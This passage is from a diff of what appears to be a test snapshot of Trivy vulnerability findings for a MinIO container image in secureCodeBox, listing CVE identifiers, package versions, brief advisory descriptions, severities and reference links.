"https://errata.almalinux.org/9/ALSA-2023-0343.html", - "https://errata.rockylinux.org/RLSA-2023:0343", - "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", - "https://gitlab.com/gnutls/libtasn1/-/issues/32", - "https://linux.oracle.com/cve/CVE-2021-46848.html", - "https://linux.oracle.com/errata/ELSA-2023-0343.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", - "https://security.netapp.com/advisory/ntap-20221118-0006/", - "https://ubuntu.com/security/notices/USN-5707-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", + "http://www.openldap.org/its/index.cgi/Incoming?id=8759", + "https://access.redhat.com/security/cve/CVE-2017-17740", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", + "https://www.cve.org/CVERecord?id=CVE-2017-17740", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "description": "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "libtasn1: Out-of-bound access in ETYPE_OK", + "name": "openldap: contrib/slapd-modules/nops/nops.c attempts to free stack buffer allowing remote attackers to cause a denial of service", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46848", + "value": "https://avd.aquasec.com/nvd/cve-2017-17740", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0343", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46848", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", }, { "type": "URL", - "value": "https://bugs.gentoo.org/866237", + "value": "http://www.openldap.org/its/index.cgi/Incoming?id=8759", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140058", + "value": "https://access.redhat.com/security/cve/CVE-2017-17740", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-17740", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0343", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-15719", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", + "https://access.redhat.com/errata/RHBA-2019:3674", + "https://access.redhat.com/security/cve/CVE-2020-15719", + "https://bugs.openldap.org/show_bug.cgi?id=9266", + "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", + "https://www.cve.org/CVERecord?id=CVE-2020-15719", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + ], + }, + "category": "Vulnerability", + "description": "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw when the third-party package is asserting RFC6125 support. It considers CN even when there is a non-matching subjectAltName (SAN). This is fixed in, for example, openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openldap: Certificate validation incorrectly matches name against CN-ID", + "references": [ { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "value": "https://avd.aquasec.com/nvd/cve-2020-15719", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "value": "https://access.redhat.com/errata/RHBA-2019:3674", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "value": "https://access.redhat.com/security/cve/CVE-2020-15719", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "value": "https://bugs.openldap.org/show_bug.cgi?id=9266", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-15719", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libmount1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5707-1", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + }, + { + "type": "URL", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { @@ -65273,7 +65695,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-29458", "installedVersion": "6.2+20201114-2", - "packageName": "libtinfo6", + "packageName": "libncurses6", "references": [ "http://seclists.org/fulldisclosure/2022/Oct/41", "https://access.redhat.com/security/cve/CVE-2022-29458", @@ -65356,7 +65778,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-29491", "installedVersion": "6.2+20201114-2", - "packageName": "libtinfo6", + "packageName": "libncurses6", "references": [ "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", "http://www.openwall.com/lists/oss-security/2023/04/19/10", @@ -65435,614 +65857,470 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", + "fixedVersion": "6.2+20201114-2+deb11u1", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "libncursesw6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "ncurses: segfaulting OOB read", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "libncursesw6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "Local users can trigger security-relevant memory corruption via malformed data", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, + "fixedVersion": "10.36-2+deb11u1", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "id": "CVE-2022-1586", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://access.redhat.com/errata/RHSA-2022:5809", + "https://access.redhat.com/security/cve/CVE-2022-1586", + "https://bugzilla.redhat.com/2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "https://errata.rockylinux.org/RLSA-2022:5809", + "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "https://linux.oracle.com/cve/CVE-2022-1586.html", + "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1586", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://avd.aquasec.com/nvd/cve-2022-1586", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://access.redhat.com/errata/RHSA-2022:5809", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://access.redhat.com/security/cve/CVE-2022-1586", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://bugzilla.redhat.com/2077976", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libudev1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", - ], - }, - "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://errata.rockylinux.org/RLSA-2022:5809", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, + 